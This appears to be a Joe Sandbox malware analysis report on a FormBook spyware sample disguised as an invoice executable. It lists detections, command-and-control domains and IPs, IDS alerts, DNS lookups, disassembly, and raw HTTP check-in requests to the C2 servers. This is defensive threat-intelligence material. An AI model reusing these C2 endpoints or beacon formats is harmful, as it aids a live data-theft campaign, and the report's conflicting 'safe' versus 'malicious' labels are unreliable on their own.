          INVOICE_90990_PDF.exe | 33% | ReversingLabs | Win32.Spyware.Noon
          INVOICE_90990_PDF.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.1.INVOICE_90990_PDF.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.INVOICE_90990_PDF.exe.3970000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.INVOICE_90990_PDF.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          topelk.com | 0% | Virustotal |
          td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal |
          www.quranvisor.com | 1% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          www.microprojects.net/usvr/ | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.theblockmeatstore.com/usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S | 100% | Avira URL Cloud | malware
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.zombiguitar.com/usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S | 0% | Avira URL Cloud | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.bavarian-luxury.com/usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.unusualdog.com/usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          topelk.com | 184.168.131.241 | true | true | | unknown
          www.zombiguitar.com | 81.17.29.150 | true | true | | unknown
          td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
          www.quranvisor.com | 1.1.1.1 | true | true | | unknown
          www.microprojects.net | 52.20.84.62 | true | true | | unknown
          www.bavarian-luxury.com | 85.13.128.31 | true | true | | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | false | | high
          www.priormakers.net | unknown | unknown | true | | unknown
          www.topelk.com | unknown | unknown | true | | unknown
          www.theblockmeatstore.com | unknown | unknown | true | | unknown
          www.17391000.com | unknown | unknown | true | | unknown
          www.unusualdog.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.microprojects.net/usvr/ | true | Avira URL Cloud: safe | low
          http://www.theblockmeatstore.com/usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S | false | Avira URL Cloud: malware | unknown
          http://www.zombiguitar.com/usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S | true | Avira URL Cloud: safe | unknown
          http://www.bavarian-luxury.com/usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S | true | Avira URL Cloud: safe | unknown
          http://www.unusualdog.com/usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Source for every row below: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp

          Name | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | false | | high
          http://www.fontbureau.com | false | | high
          http://www.fontbureau.com/designersG | false | | high
          http://www.fontbureau.com/designers/? | false | | high
          http://www.founder.com.cn/cn/bThe | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers? | false | | high
          http://www.tiro.com | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | false | | high
          http://www.goodfont.co.kr | false | URL Reputation: safe | unknown
          http://www.carterandcone.coml | false | URL Reputation: safe | unknown
          http://www.sajatypeworks.com | false | URL Reputation: safe | unknown
          http://www.typography.netD | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | false | | high
          http://www.founder.com.cn/cn/cThe | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | false | URL Reputation: safe | unknown
          http://fontfabrik.com | false | URL Reputation: safe | unknown
          http://www.founder.com.cn/cn | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers/frere-jones.html | false | | high
          http://www.jiyu-kobo.co.jp/ | false | URL Reputation: safe | unknown
          http://www.galapagosdesign.com/DPlease | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers8 | false | | high
          http://www.fonts.com | false | | high
          http://www.sandoll.co.kr | false | URL Reputation: safe | unknown
          http://www.urwpp.deDPlease | false | URL Reputation: safe | unknown
          http://www.zhongyicts.com.cn | false | URL Reputation: safe | unknown
          http://www.sakkal.com | false | URL Reputation: safe | unknown

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          81.17.29.150 | www.zombiguitar.com | Switzerland | 51852 | PLI-ASCH | true
          52.20.84.62 | www.microprojects.net | United States | 14618 | AMAZON-AESUS | true
          1.1.1.1 | www.quranvisor.com | Australia | 13335 | CLOUDFLARENETUS | true
          198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
          85.13.128.31 | www.bavarian-luxury.com | Germany | 34788 | NMM-ASD-02742FriedersdorfHauptstrasse68DE | true
          35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:461656
                                                Start date:09.08.2021
                                                Start time:13:07:44
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 42s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:INVOICE_90990_PDF.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@9/0@9/6
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 17.7% (good quality ratio 16.6%)
                                                • Quality average: 78.8%
                                                • Quality standard deviation: 29.6%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 69
                                                • Number of non-executed functions: 44
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 104.43.193.48, 131.253.33.200, 13.107.22.200, 23.211.6.115, 52.147.198.201, 23.211.4.86, 20.82.210.154, 8.253.207.121, 8.238.85.126, 8.253.95.120, 67.26.81.254, 67.26.75.254, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.50.102.62
                                                • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                • Not all processes were analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs


                                                Domains


                                                ASN


                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.753297595415183
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:INVOICE_90990_PDF.exe
                                                File size:304901
                                                MD5:3e94bee073a286e8b446e87a126dde1e
                                                SHA1:bf461d7bc78fd36eb06ca49e4e02c3bc06897905
                                                SHA256:85951f6ce24ad0c5e5a73c26b48dca2c9e013b554639e46dbf02bffd56cf1891
                                                SHA512:62f69bdcf76a8d03be76fbc3f9e92690dac88b5bcebb127b0ccf1c5fee63d7c3a22bcf49810ae7294aa2828618e0403a7cc5e61e5b6b492f3704b9e2b456e2a1
                                                SSDEEP:6144:K88JIphcJQgx6nTM0qnI9SIBxbJUvGlTcVvwKEEtWm4O2e1:j8JvJQ7Q3ISwxbJSGlTmEky+
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t.......t......gt...*...t...*...t...*...t.......t.......t...t...t..{*...t..~*=..t...tU..t..{*...t..Rich.t.........

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x402afe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                Time Stamp:0x6110C602 [Mon Aug 9 06:06:58 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:8c9e2729b91e6cd98523a27cc78ab06c

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F1F609F5512h
                                                jmp 00007F1F609F5133h
                                                push ebp
                                                mov ebp, esp
                                                mov eax, dword ptr [ebp+08h]
                                                push esi
                                                mov ecx, dword ptr [eax+3Ch]
                                                add ecx, eax
                                                movzx eax, word ptr [ecx+14h]
                                                lea edx, dword ptr [ecx+18h]
                                                add edx, eax
                                                movzx eax, word ptr [ecx+06h]
                                                imul esi, eax, 28h
                                                add esi, edx
                                                cmp edx, esi
                                                je 00007F1F609F52BBh
                                                mov ecx, dword ptr [ebp+0Ch]
                                                cmp ecx, dword ptr [edx+0Ch]
                                                jc 00007F1F609F52ACh
                                                mov eax, dword ptr [edx+08h]
                                                add eax, dword ptr [edx+0Ch]
                                                cmp ecx, eax
                                                jc 00007F1F609F52AEh
                                                add edx, 28h
                                                cmp edx, esi
                                                jne 00007F1F609F528Ch
                                                xor eax, eax
                                                pop esi
                                                pop ebp
                                                ret
                                                mov eax, edx
                                                jmp 00007F1F609F529Bh
                                                call 00007F1F609F5A19h
                                                test eax, eax
                                                jne 00007F1F609F52A5h
                                                xor al, al
                                                ret
                                                mov eax, dword ptr fs:[00000018h]
                                                push esi
                                                mov esi, 00415904h
                                                mov edx, dword ptr [eax+04h]
                                                jmp 00007F1F609F52A6h
                                                cmp edx, eax
                                                je 00007F1F609F52B2h
                                                xor eax, eax
                                                mov ecx, edx
                                                lock cmpxchg dword ptr [esi], ecx
                                                test eax, eax
                                                jne 00007F1F609F5292h
                                                xor al, al
                                                pop esi
                                                ret
                                                mov al, 01h
                                                pop esi
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                cmp dword ptr [ebp+08h], 00000000h
                                                jne 00007F1F609F52A9h
                                                mov byte ptr [00415920h], 00000001h
                                                call 00007F1F609F583Ah
                                                call 00007F1F609F74E0h
                                                test al, al
                                                jne 00007F1F609F52A6h
                                                xor al, al
                                                pop ebp
                                                ret
                                                call 00007F1F609F8D95h
                                                test al, al
                                                jne 00007F1F609F52ACh
                                                push 00000000h
                                                call 00007F1F609F74F1h
                                                pop ecx
                                                jmp 00007F1F609F528Bh
                                                mov al, 01h
                                                pop ebp
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 0Ch
                                                push esi
                                                mov esi, dword ptr [ebp+08h]
                                                test esi, esi

                                                Rich Headers

                                                Programming Language:
                                                • [LNK] VS2015 UPD3.1 build 24215
                                                • [ C ] VS2015 UPD3.1 build 24215
                                                • [RES] VS2015 UPD3 build 24213

                                                Data Directories

                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x142a4 | 0x8c | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x18000 | 0x1e0 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x13b30 | 0x54 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x13b88 | 0x40 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x16c | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                Sections

                                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0xdb64 | 0xdc00 | False | 0.559783380682 | data | 6.57010365699 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata | 0xf000 | 0x5ab2 | 0x5c00 | False | 0.419242527174 | COM executable for DOS | 4.86967907888 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0x15000 | 0x1664 | 0xa00 | False | 0.169140625 | data | 2.07405555382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .gfids | 0x17000 | 0xb4 | 0x200 | False | 0.205078125 | data | 0.920266383871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x18000 | 0x1e0 | 0x200 | False | 0.525390625 | data | 4.70468074304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                Name | RVA | Size | Type | Language | Country
                                                RT_MANIFEST | 0x18060 | 0x17d | XML 1.0 document text | English | United States

                                                Imports

                                                DLL | Import
                                                KERNEL32.dll | CloseHandle, VirtualProtect, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, lstrcmpW, GetFullPathNameW, MultiByteToWideChar, GetUserDefaultLCID, DecodePointer, WriteConsoleW, GetFileSize, CreateFileW, lstrcatW, GetCommandLineW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, RaiseException
                                                USER32.dll | GetDC, GrayStringW
                                                ADVAPI32.dll | RegOpenKeyW, RegCloseKey, RegQueryValueW
                                                SHELL32.dll | CommandLineToArgvW
                                                ole32.dll | CoInitialize, CLSIDFromProgID, CoUninitialize, CoCreateInstance
                                                OLEAUT32.dll | LoadTypeLib, SysFreeString, SysAllocStringLen

                                                Possible Origin

                                                 | Language of compilation system | Country where language is spoken |
                                                 | English | United States |

                                                Network Behavior

                                                Snort IDS Alerts

                                                 | Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
                                                 | 08/09/21-13:10:13.291455 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.5 | 1.1.1.1 |
                                                 | 08/09/21-13:10:13.291455 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.5 | 1.1.1.1 |
                                                 | 08/09/21-13:10:13.291455 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.5 | 1.1.1.1 |
                                                 | 08/09/21-13:10:44.587192 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.5 | 184.168.131.241 |
                                                 | 08/09/21-13:10:44.587192 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.5 | 184.168.131.241 |
                                                 | 08/09/21-13:10:44.587192 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.5 | 184.168.131.241 |

                                                Network Port Distribution

                                                TCP Packets


                                                UDP Packets


                                                DNS Queries

                                                 | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
                                                 | Aug 9, 2021 13:09:57.814306021 CEST | 192.168.2.5 | 8.8.8.8 | 0x30d0 | Standard query (0) | www.17391000.com | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:02.884937048 CEST | 192.168.2.5 | 8.8.8.8 | 0x5ddb | Standard query (0) | www.zombiguitar.com | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:08.003669024 CEST | 192.168.2.5 | 8.8.8.8 | 0xa41f | Standard query (0) | www.theblockmeatstore.com | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:13.208440065 CEST | 192.168.2.5 | 8.8.8.8 | 0x231 | Standard query (0) | www.quranvisor.com | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:18.338599920 CEST | 192.168.2.5 | 8.8.8.8 | 0x5d96 | Standard query (0) | www.unusualdog.com | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:23.665765047 CEST | 192.168.2.5 | 8.8.8.8 | 0x9a8f | Standard query (0) | www.microprojects.net | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:29.110493898 CEST | 192.168.2.5 | 8.8.8.8 | 0x7543 | Standard query (0) | www.bavarian-luxury.com | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:39.283677101 CEST | 192.168.2.5 | 8.8.8.8 | 0xbcd8 | Standard query (0) | www.priormakers.net | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:44.363830090 CEST | 192.168.2.5 | 8.8.8.8 | 0x461e | Standard query (0) | www.topelk.com | A (IP address) | IN (0x0001) |

                                                DNS Answers

                                                 | Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
                                                 | Aug 9, 2021 13:09:57.853600979 CEST | 8.8.8.8 | 192.168.2.5 | 0x30d0 | Name error (3) | www.17391000.com | none | none | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:02.936790943 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ddb | No error (0) | www.zombiguitar.com | | 81.17.29.150 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:08.049309015 CEST | 8.8.8.8 | 192.168.2.5 | 0xa41f | No error (0) | www.theblockmeatstore.com | www250.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:08.049309015 CEST | 8.8.8.8 | 192.168.2.5 | 0xa41f | No error (0) | www250.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:08.049309015 CEST | 8.8.8.8 | 192.168.2.5 | 0xa41f | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:08.049309015 CEST | 8.8.8.8 | 192.168.2.5 | 0xa41f | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:08.049309015 CEST | 8.8.8.8 | 192.168.2.5 | 0xa41f | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:13.270809889 CEST | 8.8.8.8 | 192.168.2.5 | 0x231 | No error (0) | www.quranvisor.com | | 1.1.1.1 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:18.384635925 CEST | 8.8.8.8 | 192.168.2.5 | 0x5d96 | No error (0) | www.unusualdog.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:18.384635925 CEST | 8.8.8.8 | 192.168.2.5 | 0x5d96 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:18.384635925 CEST | 8.8.8.8 | 192.168.2.5 | 0x5d96 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:18.384635925 CEST | 8.8.8.8 | 192.168.2.5 | 0x5d96 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:18.384635925 CEST | 8.8.8.8 | 192.168.2.5 | 0x5d96 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:23.788676977 CEST | 8.8.8.8 | 192.168.2.5 | 0x9a8f | No error (0) | www.microprojects.net | | 52.20.84.62 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:29.172875881 CEST | 8.8.8.8 | 192.168.2.5 | 0x7543 | No error (0) | www.bavarian-luxury.com | | 85.13.128.31 | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:39.350934029 CEST | 8.8.8.8 | 192.168.2.5 | 0xbcd8 | Server failure (2) | www.priormakers.net | none | none | A (IP address) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:44.403175116 CEST | 8.8.8.8 | 192.168.2.5 | 0x461e | No error (0) | www.topelk.com | topelk.com | | CNAME (Canonical name) | IN (0x0001) |
                                                 | Aug 9, 2021 13:10:44.403175116 CEST | 8.8.8.8 | 192.168.2.5 | 0x461e | No error (0) | topelk.com | | 184.168.131.241 | A (IP address) | IN (0x0001) |

                                                HTTP Request Dependency Graph

                                                • www.zombiguitar.com
                                                • www.theblockmeatstore.com
                                                • www.quranvisor.com
                                                • www.unusualdog.com
                                                • www.microprojects.net
                                                • www.bavarian-luxury.com

                                                HTTP Packets

                                                 | Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
                                                 | 0 | 192.168.2.5 | 49726 | 81.17.29.150 | 80 | C:\Windows\explorer.exe |
                                                 Timestamp: Aug 9, 2021 13:10:02.960010052 CEST | kBytes transferred: 6055 | Direction: OUT
                                                 GET /usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1
                                                Host: www.zombiguitar.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                 Timestamp: Aug 9, 2021 13:10:02.985369921 CEST | kBytes transferred: 6056 | Direction: IN
                                                 HTTP/1.1 200 OK
                                                cache-control: max-age=0, private, must-revalidate
                                                connection: close
                                                content-length: 589
                                                content-type: text/html; charset=utf-8
                                                date: Mon, 09 Aug 2021 11:10:02 GMT
                                                server: nginx
                                                set-cookie: sid=582eba9e-f902-11eb-a2ae-d2c2afec561e; path=/; domain=.zombiguitar.com; expires=Sat, 27 Aug 2089 14:24:09 GMT; max-age=2147483647; HttpOnly
                                                Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.zombiguitar.com/usvr/?Pjf81=-Zdd-V5hqhM4p2S&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYyODUxNDYwMiwiaWF0IjoxNjI4NTA3NDAyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycWNwdG1tazYyNXVxZjB0YnMwMml0aWwiLCJuYmYiOjE2Mjg1MDc0MDIsInRzIjoxNjI4NTA3NDAyOTcxMDk0fQ.dY2VBBa4EoFNnoNLxT9V4HeF1_RqAGHAqViFgfCRln4&mN9d3vF=mSPJpO37iDi%2FJJOtFEB7cPoDq+rcFEXmmeg8f%2F%2FWLLXT9MV2z86QjVFC%2FG6KvJkMQ56%2F&sid=582eba9e-f902-11eb-a2ae-d2c2afec561e');</script></body></html>


                                                 | Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
                                                 | 1 | 192.168.2.5 | 49727 | 35.246.6.109 | 80 | C:\Windows\explorer.exe |
                                                 Timestamp: Aug 9, 2021 13:10:08.095585108 CEST | kBytes transferred: 6057 | Direction: OUT
                                                 GET /usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1
                                                Host: www.theblockmeatstore.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                 Timestamp: Aug 9, 2021 13:10:08.181669950 CEST | kBytes transferred: 6058 | Direction: IN
                                                 HTTP/1.1 301 Moved Permanently
                                                Date: Mon, 09 Aug 2021 11:10:08 GMT
                                                Content-Length: 0
                                                Connection: close
